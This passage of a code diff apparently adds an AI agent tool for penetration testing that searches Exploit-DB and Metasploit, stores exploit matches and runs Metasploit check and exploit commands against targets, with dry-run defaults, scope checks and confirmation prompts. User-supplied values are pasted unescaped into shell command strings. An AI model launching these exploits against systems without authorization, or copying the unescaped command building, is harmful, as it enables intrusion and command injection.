+          const cves = title.match(/CVE-\d{4}-\d+/gi) || undefined
+          exploits.push({
+            id,
+            title,
+            path,
+            cve: cves ? [...new Set(cves)] : undefined,
+          })
+        }
+      }
+    }
+
+    return {
+      query,
+      exploits,
+      timestamp: Date.now(),
+    }
+  }
+
+  /**
+   * Extract EDB-ID from file path.
+   */
+  function extractIdFromPath(path: string): string {
+    const match = path?.match(/(\d+)\.[a-z]+$/i)
+    return match ? match[1] : ""
+  }
+
+  /**
+   * Map searchsploit type to enum.
+   */
+  function mapExploitType(type?: string): ExploitTypes.ExploitType | undefined {
+    if (!type) return undefined
+    const map: Record<string, ExploitTypes.ExploitType> = {
+      remote: "remote",
+      local: "local",
+      webapps: "webapps",
+      dos: "dos",
+      shellcode: "shellcode",
+      papers: "papers",
+    }
+    return map[type.toLowerCase()] || undefined
+  }
+
+  /**
+   * Map platform string to enum.
+   */
+  function mapPlatform(platform?: string): ExploitTypes.Platform | undefined {
+    if (!platform) return undefined
+    const lower = platform.toLowerCase()
+    if (lower.includes("linux")) return "linux"
+    if (lower.includes("windows")) return "windows"
+    if (lower.includes("mac") || lower.includes("osx")) return "macos"
+    if (lower.includes("unix")) return "unix"
+    if (lower.includes("freebsd")) return "freebsd"
+    if (lower.includes("android")) return "android"
+    if (lower.includes("ios")) return "ios"
+    if (lower.includes("multi") || lower.includes("cross")) return "multi"
+    if (lower.includes("hardware")) return "hardware"
+    return "unknown"
+  }
+
+  /**
+   * Format searchsploit result as human-readable text.
+   */
+  export function format(result: ExploitTypes.SearchsploitResult): string {
+    const lines: string[] = []
+
+    lines.push(`Searchsploit Results for: "${result.query}"`)
+    lines.push("=".repeat(60))
+    lines.push("")
+
+    if (
+      result.exploits.length === 0 &&
+      !result.shellcodes?.length &&
+      !result.papers?.length
+    ) {
+      lines.push("No exploits found.")
+      return lines.join("\n")
+    }
+
+    // Exploits
+    if (result.exploits.length > 0) {
+      lines.push(`EXPLOITS (${result.exploits.length})`)
+      lines.push("-".repeat(60))
+      for (const e of result.exploits) {
+        lines.push(`[EDB-${e.id}] ${e.title}`)
+        lines.push(`  Path: ${e.path}`)
+        if (e.cve?.length) lines.push(`  CVE: ${e.cve.join(", ")}`)
+        if (e.platform) lines.push(`  Platform: ${e.platform}`)
+        if (e.verified) lines.push(`  Verified: Yes`)
+        lines.push("")
+      }
+    }
+
+    // Shellcodes
+    if (result.shellcodes?.length) {
+      lines.push(`SHELLCODES (${result.shellcodes.length})`)
+      lines.push("-".repeat(60))
+      for (const s of result.shellcodes) {
+        lines.push(`[EDB-${s.id}] ${s.title}`)
+        lines.push(`  Path: ${s.path}`)
+        lines.push("")
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize results.
+   */
+  export function summarize(result: ExploitTypes.SearchsploitResult): string {
+    const parts = [`Found ${result.exploits.length} exploit(s)`]
+    if (result.shellcodes?.length)
+      parts.push(`${result.shellcodes.length} shellcode(s)`)
+    const verified = result.exploits.filter((e) => e.verified).length
+    if (verified > 0) parts.push(`${verified} verified`)
+    return parts.join(", ")
+  }
+
+  /**
+   * Convert searchsploit results to exploit matches for a finding.
+   */
+  export function toMatches(
+    result: ExploitTypes.SearchsploitResult,
+    findingID: string,
+    matchReason: string,
+    confidence: ExploitTypes.Confidence = "medium"
+  ): Array<Omit<ExploitTypes.ExploitMatch, "id" | "createdAt">> {
+    return result.exploits.map((exploit) => ({
+      findingID,
+      source: "exploit-db" as const,
+      exploitID: exploit.id,
+      title: exploit.title,
+      type: exploit.type,
+      confidence,
+      matchReason,
+      cve: exploit.cve,
+      url: `https://www.exploit-db.com/exploits/${exploit.id}`,
+      path: exploit.path,
+      status: "suggested" as const,
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/exploits/storage.ts b/packages/opencode/src/pentest/exploits/storage.ts
new file mode 100644
index 00000000000..b0d48f333c0
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/storage.ts
@@ -0,0 +1,375 @@
+/**
+ * @fileoverview Exploit Data Storage
+ *
+ * Storage helpers for exploit matches and execution results.
+ *
+ * @module pentest/exploits/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { ExploitTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.exploits.storage" })
+
+/**
+ * Generate a unique match ID.
+ */
+function generateMatchId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `match_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique execution ID.
+ */
+function generateExecId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `exec_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * Exploit storage namespace.
+ */
+export namespace ExploitStorage {
+  /** In-memory buffer for testing */
+  const matchBuffer: ExploitTypes.ExploitMatch[] = []
+  const executionBuffer: ExploitTypes.ExploitExecutionResult[] = []
+
+  /**
+   * Save an exploit match.
+   *
+   * @param match - Match to save (id and createdAt will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved match with ID
+   */
+  export async function saveMatch(
+    match: Omit<ExploitTypes.ExploitMatch, "id" | "createdAt"> | ExploitTypes.ExploitMatch,
+    config: StorageConfig = {}
+  ): Promise<ExploitTypes.ExploitMatch> {
+    const full: ExploitTypes.ExploitMatch = {
+      ...match,
+      id: "id" in match && match.id ? match.id : generateMatchId(),
+      createdAt: "createdAt" in match && match.createdAt ? match.createdAt : Date.now(),
+    }
+    const validated = ExploitTypes.ExploitMatch.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = matchBuffer.findIndex((m) => m.id === validated.id)
+      if (existingIdx >= 0) {
+        matchBuffer[existingIdx] = validated
+      } else {
+        matchBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(
+        ["pentest", "exploits", "matches", validated.id],
+        validated
+      )
+    }
+
+    log.info("Exploit match saved", {
+      id: validated.id,
+      exploitID: validated.exploitID,
+    })
+    return validated
+  }
+
+  /**
+   * Get a match by ID.
+   *
+   * @param id - Match ID
+   * @param config - Storage configuration
+   * @returns Match or null if not found
+   */
+  export async function getMatch(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<ExploitTypes.ExploitMatch | null> {
+    if (config.storage === "memory") {
+      return matchBuffer.find((m) => m.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<ExploitTypes.ExploitMatch>([
+        "pentest",
+        "exploits",
+        "matches",
+        id,
+      ])
+      return ExploitTypes.ExploitMatch.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List matches with filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of matches
+   */
+  export async function listMatches(
+    config: StorageConfig = {},
+    filters?: {
+      findingID?: string
+      source?: ExploitTypes.ExploitSource
+      status?: ExploitTypes.MatchStatus
+      limit?: number
+    }
+  ): Promise<ExploitTypes.ExploitMatch[]> {
+    let matches: ExploitTypes.ExploitMatch[]
+
+    if (config.storage === "memory") {
+      matches = [...matchBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "exploits", "matches"])
+      matches = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ExploitTypes.ExploitMatch>(key)
+          matches.push(ExploitTypes.ExploitMatch.parse(data))
+        } catch {
+          log.warn("Failed to parse match file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.findingID) {
+      matches = matches.filter((m) => m.findingID === filters.findingID)
+    }
+    if (filters?.source) {
+      matches = matches.filter((m) => m.source === filters.source)
+    }
+    if (filters?.status) {
+      matches = matches.filter((m) => m.status === filters.status)
+    }
+
+    // Sort by creation time (newest first)
+    matches.sort((a, b) => b.createdAt - a.createdAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      matches = matches.slice(0, filters.limit)
+    }
+
+    return matches
+  }
+
+  /**
+   * Update match status.
+   *
+   * @param id - Match ID
+   * @param status - New status
+   * @param config - Storage configuration
+   * @returns Updated match or null if not found
+   */
+  export async function updateMatchStatus(
+    id: string,
+    status: ExploitTypes.MatchStatus,
+    config: StorageConfig = {}
+  ): Promise<ExploitTypes.ExploitMatch | null> {
+    const match = await getMatch(id, config)
+    if (!match) return null
+
+    const updated: ExploitTypes.ExploitMatch = {
+      ...match,
+      status,
+      verifiedAt: status === "verified" ? Date.now() : match.verifiedAt,
+    }
+
+    if (config.storage === "memory") {
+      const idx = matchBuffer.findIndex((m) => m.id === id)
+      if (idx >= 0) matchBuffer[idx] = updated
+    } else {
+      await Storage.write(["pentest", "exploits", "matches", id], updated)
+    }
+
+    return updated
+  }
+
+  /**
+   * Delete a match.
+   *
+   * @param id - Match ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteMatch(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = matchBuffer.findIndex((m) => m.id === id)
+      if (idx >= 0) {
+        matchBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "exploits", "matches", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Save execution result.
+   *
+   * @param result - Execution result (id will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved result with ID
+   */
+  export async function saveExecution(
+    result: Omit<ExploitTypes.ExploitExecutionResult, "id">,
+    config: StorageConfig = {}
+  ): Promise<ExploitTypes.ExploitExecutionResult> {
+    const full: ExploitTypes.ExploitExecutionResult = {
+      ...result,
+      id: generateExecId(),
+    }
+    const validated = ExploitTypes.ExploitExecutionResult.parse(full)
+
+    if (config.storage === "memory") {
+      executionBuffer.push(validated)
+    } else {
+      await Storage.write(
+        ["pentest", "exploits", "executions", validated.id],
+        validated
+      )
+    }
+
+    log.info("Execution result saved", {
+      id: validated.id,
+      module: validated.exploitID,
+      status: validated.status,
+    })
+
+    return validated
+  }
+
+  /**
+   * Get an execution result by ID.
+   *
+   * @param id - Execution ID
+   * @param config - Storage configuration
+   * @returns Execution result or null if not found
+   */
+  export async function getExecution(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<ExploitTypes.ExploitExecutionResult | null> {
+    if (config.storage === "memory") {
+      return executionBuffer.find((e) => e.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<ExploitTypes.ExploitExecutionResult>([
+        "pentest",
+        "exploits",
+        "executions",
+        id,
+      ])
+      return ExploitTypes.ExploitExecutionResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List execution results.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of execution results
+   */
+  export async function listExecutions(
+    config: StorageConfig = {},
+    filters?: {
+      matchID?: string
+      target?: string
+      status?: ExploitTypes.ExecutionStatus
+      limit?: number
+    }
+  ): Promise<ExploitTypes.ExploitExecutionResult[]> {
+    let executions: ExploitTypes.ExploitExecutionResult[]
+
+    if (config.storage === "memory") {
+      executions = [...executionBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "exploits", "executions"])
+      executions = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ExploitTypes.ExploitExecutionResult>(key)
+          executions.push(ExploitTypes.ExploitExecutionResult.parse(data))
+        } catch {
+          log.warn("Failed to parse execution file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.matchID) {
+      executions = executions.filter((e) => e.matchID === filters.matchID)
+    }
+    if (filters?.target) {
+      executions = executions.filter((e) => e.target === filters.target)
+    }
+    if (filters?.status) {
+      executions = executions.filter((e) => e.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    executions.sort((a, b) => b.startTime - a.startTime)
+
+    // Apply limit
+    if (filters?.limit) {
+      executions = executions.slice(0, filters.limit)
+    }
+
+    return executions
+  }
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    matchBuffer.length = 0
+    executionBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): { matches: number; executions: number } {
+    return {
+      matches: matchBuffer.length,
+      executions: executionBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/exploits/tool.ts b/packages/opencode/src/pentest/exploits/tool.ts
new file mode 100644
index 00000000000..51394f3943a
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/tool.ts
@@ -0,0 +1,780 @@
+/**
+ * @fileoverview Exploit Tool
+ *
+ * Agent tool for searching, suggesting, and executing exploits.
+ * ALL exploit execution requires explicit user confirmation.
+ *
+ * @module pentest/exploits/tool
+ */
+
+import z from "zod"
+import { spawn } from "child_process"
+import { Tool } from "../../tool/tool"
+import { Log } from "../../util/log"
+import { Bus } from "../../bus"
+import { Instance } from "../../project/instance"
+import { ExploitTypes } from "./types"
+import { ExploitMatcher } from "./matcher"
+import { ExploitStorage } from "./storage"
+import { ExploitEvents } from "./events"
+import { SearchsploitParser } from "./parsers/searchsploit"
+import { MetasploitParser } from "./parsers/metasploit"
+import { Findings } from "../findings"
+import { GovernanceScope } from "../../governance/scope"
+import { GovernanceMatcher } from "../../governance/matcher"
+
+const log = Log.create({ service: "pentest.exploits.tool" })
+
+const DEFAULT_TIMEOUT = 60 * 1000 // 1 minute
+
+/**
+ * Exploit Tool for penetration testing.
+ *
+ * Provides search, suggestion, and execution capabilities for:
+ * - Exploit-DB via searchsploit
+ * - Metasploit Framework modules
+ *
+ * SAFETY: All exploit execution requires explicit user confirmation.
+ * Dry-run mode shows what would happen without executing.
+ */
+export const ExploitTool = Tool.define("exploit", async () => {
+  return {
+    description: `Search and manage exploits from Exploit-DB and Metasploit Framework.
+
+ACTIONS:
+- search: Search exploit databases by keyword, CVE, or service
+- suggest: Auto-suggest exploits based on scan findings
+- info: Get detailed information about a specific exploit/module
+- check: Run exploit check method (verifies vulnerability without exploitation)
+- execute: Execute an exploit (REQUIRES CONFIRMATION, supports dry-run)
+- list: List saved exploit matches
+
+SAFETY:
+- ALL exploit execution requires user confirmation
+- Scope validation is enforced for targets
+- Dry-run mode (default) shows command without execution
+- Audit logging for all operations
+
+EXAMPLES:
+- Search: action="search", query="apache 2.4"
+- Suggest: action="suggest", findingID="finding_abc123"
+- Info: action="info", module="exploit/linux/http/apache_mod_cgi_bash_env_exec"
+- Check: action="check", module="exploit/...", target="192.168.1.1"
+- Execute: action="execute", module="exploit/...", target="192.168.1.1", dryRun=false`,
+
+    parameters: z.object({
+      action: z
+        .enum(["search", "suggest", "info", "check", "execute", "list"])
+        .describe("Action to perform"),
+
+      // Search parameters
+      query: z
+        .string()
+        .optional()
+        .describe("Search query (CVE, service name, keyword)"),
+      source: z
+        .enum(["searchsploit", "metasploit", "both"])
+        .optional()
+        .describe("Exploit source to search. Default: both"),
+
+      // Suggestion parameters
+      findingID: z
+        .string()
+        .optional()
+        .describe("Finding ID to suggest exploits for"),
+
+      // Module parameters
+      module: z
+        .string()
+        .optional()
+        .describe("Exploit module name (MSF path or EDB ID)"),
+
+      // Execution parameters
+      target: z
+        .string()
+        .optional()
+        .describe("Target IP or hostname for check/execute"),
+      options: z
+        .record(z.string(), z.any())
+        .optional()
+        .describe("Module options (RHOSTS, RPORT, etc.)"),
+      dryRun: z
+        .boolean()
+        .optional()
+        .default(true)
+        .describe("Dry run mode - show command without executing. Default: true"),
+
+      // Other
+      limit: z
+        .number()
+        .optional()
+        .default(10)
+        .describe("Maximum results to return. Default: 10"),
+      timeout: z
+        .number()
+        .optional()
+        .describe("Timeout in milliseconds. Default: 60000"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "search":
+          return handleSearch(params, ctx)
+
+        case "suggest":
+          return handleSuggest(params, ctx)
+
+        case "info":
+          return handleInfo(params, ctx)
+
+        case "check":
+          return handleCheck(params, ctx)
+
+        case "execute":
+          return handleExecute(params, ctx)
+
+        case "list":
+          return handleList(params)
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Supported actions: search, suggest, info, check, execute, list`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle search action.
+ */
+async function handleSearch(
+  params: {
+    query?: string
+    source?: string
+    limit?: number
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.query) {
+    return {
+      title: "Search requires query",
+      output: "Please provide a search query (CVE, service name, or keyword).",
+      metadata: { action: "search", status: "error" },
+    }
+  }
+
+  const source = params.source || "both"
+  const timeout = params.timeout || DEFAULT_TIMEOUT
+  const results: string[] = []
+
+  // Request permission
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`searchsploit *`, `msfconsole *`],
+    always: [`searchsploit *`, `msfconsole *`],
+    metadata: { action: "search", query: params.query },
+  })
+
+  ctx.metadata({
+    title: `Searching exploits: ${params.query}`,
+    metadata: { action: "search", query: params.query, status: "running" },
+  })
+
+  // Search searchsploit
+  if (source === "searchsploit" || source === "both") {
+    try {
+      const output = await runCommand(`searchsploit -j "${params.query}"`, timeout)
+      const result = SearchsploitParser.parse(output, params.query)
+      results.push(SearchsploitParser.format(result))
+
+      Bus.publish(ExploitEvents.SearchCompleted, {
+        source: "exploit-db",
+        query: params.query,
+        resultCount: result.exploits.length,
+      })
+    } catch (err) {
+      results.push(
+        `Searchsploit error: ${err instanceof Error ? err.message : err}`
+      )
+    }
+  }
+
+  // Search metasploit
+  if (source === "metasploit" || source === "both") {
+    try {
+      const output = await runCommand(
+        `msfconsole -q -x "search ${params.query}; exit"`,
+        timeout * 2
+      )
+      const result = MetasploitParser.parseSearch(output, params.query)
+      results.push(MetasploitParser.format(result))
+
+      Bus.publish(ExploitEvents.SearchCompleted, {
+        source: "metasploit",
+        query: params.query,
+        resultCount: result.modules.length,
+      })
+    } catch (err) {
+      results.push(
+        `Metasploit error: ${err instanceof Error ? err.message : err}`
+      )
+    }
+  }
+
+  return {
+    title: `Exploit search: ${params.query}`,
+    output: results.join("\n\n"),
+    metadata: { action: "search", query: params.query, source, status: "completed" },
+  }
+}
+
+/**
+ * Handle suggest action.
+ */
+async function handleSuggest(
+  params: { findingID?: string; limit?: number },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.findingID) {
+    return {
+      title: "Suggest requires findingID",
+      output: "Please provide a finding ID to suggest exploits for.",
+      metadata: { action: "suggest", status: "error" },
+    }
+  }
+
+  const finding = await Findings.get(params.findingID, { storage: "file" })
+  if (!finding) {
+    return {
+      title: "Finding not found",
+      output: `No finding with ID: ${params.findingID}`,
+      metadata: { action: "suggest", findingID: params.findingID, status: "error" },
+    }
+  }
+
+  // Request permission
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`searchsploit *`, `msfconsole *`],
+    always: [`searchsploit *`, `msfconsole *`],
+    metadata: { action: "suggest", findingID: params.findingID },
+  })
+
+  ctx.metadata({
+    title: `Finding exploits for: ${finding.title}`,
+    metadata: { action: "suggest", findingID: params.findingID, status: "running" },
+  })
+
+  const matches = await ExploitMatcher.matchFinding(finding, {
+    searchsploit: true,
+    metasploit: true,
+    limit: params.limit || 10,
+  })
+
+  // Rank and save matches
+  const ranked = ExploitMatcher.rankMatches(matches)
+  for (const match of ranked) {
+    await ExploitStorage.saveMatch(match)
+  }
+
+  // Format output
+  const lines: string[] = []
+  lines.push(`Exploit Suggestions for: ${finding.title}`)
+  lines.push(`Target: ${finding.target}:${finding.port || "N/A"}`)
+  lines.push(`CVEs: ${finding.cve?.join(", ") || "None"}`)
+  lines.push("=".repeat(60))
+  lines.push("")
+
+  if (ranked.length === 0) {
+    lines.push("No matching exploits found.")
+  } else {
+    for (const match of ranked) {
+      const confIcon = { high: "!!!", medium: "!!", low: "!" }[match.confidence]
+      lines.push(`[${confIcon}] ${match.title}`)
+      lines.push(`  ID: ${match.exploitID}`)
+      lines.push(`  Source: ${match.source}`)
+      lines.push(`  Confidence: ${match.confidence}`)
+      lines.push(`  Reason: ${match.matchReason}`)
+      if (match.rank) lines.push(`  Rank: ${match.rank}`)
+      if (match.url) lines.push(`  URL: ${match.url}`)
+      lines.push("")
+    }
+  }
+
+  Bus.publish(ExploitEvents.SuggestionsGenerated, {
+    findingID: finding.id,
+    matchCount: ranked.length,
+  })
+
+  return {
+    title: `Found ${ranked.length} exploit(s) for finding`,
+    output: lines.join("\n"),
+    metadata: {
+      action: "suggest",
+      findingID: params.findingID,
+      matchCount: ranked.length,
+      status: "completed",
+    },
+  }
+}
+
+/**
+ * Handle info action.
+ */
+async function handleInfo(
+  params: { module?: string; timeout?: number },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.module) {
+    return {
+      title: "Info requires module",
+      output: "Please provide a module name (MSF path or EDB ID).",
+      metadata: { action: "info", status: "error" },
+    }
+  }
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`msfconsole *`, `searchsploit *`],
+    always: [`msfconsole *`],
+    metadata: { action: "info", module: params.module },
+  })
+
+  ctx.metadata({
+    title: `Getting info: ${params.module}`,
+    metadata: { action: "info", module: params.module, status: "running" },
+  })
+
+  const timeout = params.timeout || DEFAULT_TIMEOUT
+
+  // Determine source by module format
+  if (params.module.includes("/")) {
+    // MSF module
+    try {
+      const output = await runCommand(
+        `msfconsole -q -x "info ${params.module}; exit"`,
+        timeout * 2
+      )
+      return {
+        title: `Module info: ${params.module}`,
+        output,
+        metadata: {
+          action: "info",
+          module: params.module,
+          source: "metasploit",
+          status: "completed",
+        },
+      }
+    } catch (err) {
+      return {
+        title: "Module info failed",
+        output: `Error: ${err instanceof Error ? err.message : err}`,
+        metadata: { action: "info", module: params.module, status: "error" },
+      }
+    }
+  } else {
+    // EDB ID
+    try {
+      const output = await runCommand(`searchsploit -x ${params.module}`, timeout)
+      return {
+        title: `Exploit info: EDB-${params.module}`,
+        output,
+        metadata: {
+          action: "info",
+          module: params.module,
+          source: "exploit-db",
+          status: "completed",
+        },
+      }
+    } catch (err) {
+      return {
+        title: "Exploit info failed",
+        output: `Error: ${err instanceof Error ? err.message : err}`,
+        metadata: { action: "info", module: params.module, status: "error" },
+      }
+    }
+  }
+}
+
+/**
+ * Handle check action (verify vulnerability without exploitation).
+ */
+async function handleCheck(
+  params: {
+    module?: string
+    target?: string
+    options?: Record<string, any>
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.module || !params.target) {
+    return {
+      title: "Check requires module and target",
+      output: "Please provide both module and target parameters.",
+      metadata: { action: "check", status: "error" },
+    }
+  }
+
+  // Validate target against governance scope
+  const targets = GovernanceMatcher.extractTargets("exploit", {
+    target: params.target,
+  })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "check", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  // Build check command
+  const optStr = params.options
+    ? Object.entries(params.options)
+        .map(([k, v]) => `set ${k} ${v}`)
+        .join("; ")
+    : ""
+
+  const command = `msfconsole -q -x "use ${params.module}; set RHOSTS ${params.target}; ${optStr}; check; exit"`
+
+  // Request permission with explicit check context
+  await ctx.ask({
+    permission: "bash",
+    patterns: [command],
+    always: [], // Never auto-approve exploit commands
+    metadata: {
+      action: "check",
+      module: params.module,
+      target: params.target,
+      note: "This runs the exploit CHECK method, not the exploit itself",
+    },
+  })
+
+  ctx.metadata({
+    title: `Checking ${params.module} against ${params.target}`,
+    metadata: {
+      action: "check",
+      module: params.module,
+      target: params.target,
+      status: "running",
+    },
+  })
+
+  try {
+    const output = await runCommand(command, (params.timeout || DEFAULT_TIMEOUT) * 2)
+
+    // Determine result
+    const vulnerable = output.toLowerCase().includes("vulnerable")
+
+    Bus.publish(ExploitEvents.CheckExecuted, {
+      module: params.module,
+      target: params.target,
+      result: vulnerable ? "vulnerable" : "not_vulnerable",
+    })
+
+    return {
+      title: `Check complete: ${params.module}`,
+      output,
+      metadata: {
+        action: "check",
+        module: params.module,
+        target: params.target,
+        vulnerable,
+        status: "completed",
+      },
+    }
+  } catch (err) {
+    Bus.publish(ExploitEvents.CheckExecuted, {
+      module: params.module,
+      target: params.target,
+      result: "error",
+    })
+
+    return {
+      title: "Check failed",
+      output: `Error: ${err instanceof Error ? err.message : err}`,
+      metadata: { action: "check", module: params.module, target: params.target, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle execute action (REQUIRES EXPLICIT CONFIRMATION).
+ */
+async function handleExecute(
+  params: {
+    module?: string
+    target?: string
+    options?: Record<string, any>
+    dryRun?: boolean
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.module || !params.target) {
+    return {
+      title: "Execute requires module and target",
+      output: "Please provide both module and target parameters.",
+      metadata: { action: "execute", status: "error" },
+    }
+  }
+
+  const isDryRun = params.dryRun !== false // Default to dry run
+
+  // Validate target against governance scope
+  const targets = GovernanceMatcher.extractTargets("exploit", {
+    target: params.target,
+  })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "execute", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  // Build execution command
+  const optStr = params.options
+    ? Object.entries(params.options)
+        .map(([k, v]) => `set ${k} ${v}`)
+        .join("; ")
+    : ""
+
+  const command = `msfconsole -q -x "use ${params.module}; set RHOSTS ${params.target}; ${optStr}; exploit; exit"`
+
+  if (isDryRun) {
+    // Dry run - just show what would happen
+    const lines: string[] = []
+    lines.push("=== DRY RUN MODE ===")
+    lines.push("")
+    lines.push("The following command would be executed:")
+    lines.push("")
+    lines.push(`  ${command}`)
+    lines.push("")
+    lines.push("Module: " + params.module)
+    lines.push("Target: " + params.target)
+    if (params.options) {
+      lines.push("Options:")
+      for (const [k, v] of Object.entries(params.options)) {
+        lines.push(`  ${k}: ${v}`)
+      }
+    }
+    lines.push("")
+    lines.push("To execute for real, set dryRun=false")
+    lines.push("")
+    lines.push("WARNING: Exploit execution can cause system instability or data loss.")
+    lines.push("Only proceed with explicit authorization.")
+
+    Bus.publish(ExploitEvents.ExecutionDryRun, {
+      module: params.module,
+      target: params.target,
+      command,
+    })
+
+    return {
+      title: "Dry run: " + params.module,
+      output: lines.join("\n"),
+      metadata: {
+        action: "execute",
+        module: params.module,
+        target: params.target,
+        dryRun: true,
+        status: "dry_run",
+      },
+    }
+  }
+
+  // Real execution - REQUIRE EXPLICIT CONFIRMATION
+  await ctx.ask({
+    permission: "bash",
+    patterns: [command],
+    always: [], // NEVER auto-approve exploit execution
+    metadata: {
+      action: "EXPLOIT EXECUTION",
+      module: params.module,
+      target: params.target,
+      warning: "This will attempt to exploit the target system",
+      note: "Ensure you have explicit authorization before proceeding",
+    },
+  })
+
+  ctx.metadata({
+    title: `Executing ${params.module} against ${params.target}`,
+    metadata: {
+      action: "execute",
+      module: params.module,
+      target: params.target,
+      status: "running",
+    },
+  })
+
+  const startTime = Date.now()
+
+  try {
+    const output = await runCommand(command, (params.timeout || DEFAULT_TIMEOUT) * 3)
+    const endTime = Date.now()
+
+    // Parse result
+    const success = output.includes("session") || output.includes("opened")
+
+    // Save execution result
+    await ExploitStorage.saveExecution({
+      matchID: "",
+      target: params.target,
+      source: "metasploit",
+      exploitID: params.module,
+      status: success ? "success" : "failed",
+      dryRun: false,
+      output,
+      startTime,
+      endTime,
+    })
+
+    Bus.publish(ExploitEvents.ExecutionCompleted, {
+      module: params.module,
+      target: params.target,
+      success,
+      duration: endTime - startTime,
+    })
+
+    return {
+      title: success
+        ? `Exploit succeeded: ${params.module}`
+        : `Exploit completed: ${params.module}`,
+      output,
+      metadata: {
+        action: "execute",
+        module: params.module,
+        target: params.target,
+        dryRun: false,
+        success,
+        status: "completed",
+      },
+    }
+  } catch (err) {
+    const endTime = Date.now()
+
+    await ExploitStorage.saveExecution({
+      matchID: "",
+      target: params.target,
+      source: "metasploit",
+      exploitID: params.module,
+      status: "error",
+      dryRun: false,
+      error: err instanceof Error ? err.message : String(err),
+      startTime,
+      endTime,
+    })
+
+    Bus.publish(ExploitEvents.ExecutionFailed, {
+      module: params.module,
+      target: params.target,
+      error: err instanceof Error ? err.message : String(err),
+    })
+
+    return {
+      title: "Exploit execution failed",
+      output: `Error: ${err instanceof Error ? err.message : err}`,
+      metadata: {
+        action: "execute",
+        module: params.module,
+        target: params.target,
+        dryRun: false,
+        status: "error",
+      },
+    }
+  }
+}
+
+/**
+ * Handle list action.
+ */
+async function handleList(params: {
+  findingID?: string
+  limit?: number
+}): Promise<{ title: string; output: string; metadata: any }> {
+  const matches = await ExploitStorage.listMatches({}, {
+    findingID: params.findingID,
+    limit: params.limit || 20,
+  })
+
+  if (matches.length === 0) {
+    return {
+      title: "No exploit matches found",
+      output: params.findingID
+        ? `No exploit matches for finding: ${params.findingID}`
+        : "No saved exploit matches.",
+      metadata: { action: "list", count: 0, status: "completed" },
+    }
+  }
+
+  const lines: string[] = []
+  lines.push(`Saved Exploit Matches (${matches.length})`)
+  lines.push("=".repeat(60))
+
+  for (const match of matches) {
+    lines.push("")
+    lines.push(`[${match.confidence}] ${match.title}`)
+    lines.push(`  Match ID: ${match.id}`)
+    lines.push(`  Finding: ${match.findingID}`)
+    lines.push(`  Source: ${match.source}`)
